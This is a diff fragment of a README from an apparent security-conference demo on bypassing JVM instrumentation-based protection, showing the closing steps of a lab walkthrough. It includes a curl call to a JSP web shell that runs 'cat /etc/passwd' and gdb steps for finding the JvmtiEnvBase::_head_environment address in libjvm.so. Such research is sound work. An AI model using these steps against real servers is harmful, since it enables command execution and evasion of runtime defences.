mouadk/Insomnihack2024/bypass-using-instrumentation/README.md

 `
 11. Rerun and Enjoy the bypass:
     `curl "http://localhost:8080/exploit.jsp?cmd=cat%20/etc/passwd" `
-You may need to update the base address of JvmtiEnvBase::_head_environment, first ssh in the container, find / -name libjvm.so 2>/dev/null, and finally gdb /usr/local/openjdk-11/lib/server/libjvm.so + info variables and then you have it
+You would need to update the base address of JvmtiEnvBase::_head_environment, first ssh in the container, find / -name libjvm.so 2>/dev/null, and finally gdb /usr/local/openjdk-11/lib/server/libjvm.so + info variables and then you have it
 `0x0000000000f59750  JvmtiEnvBase::_head_environment`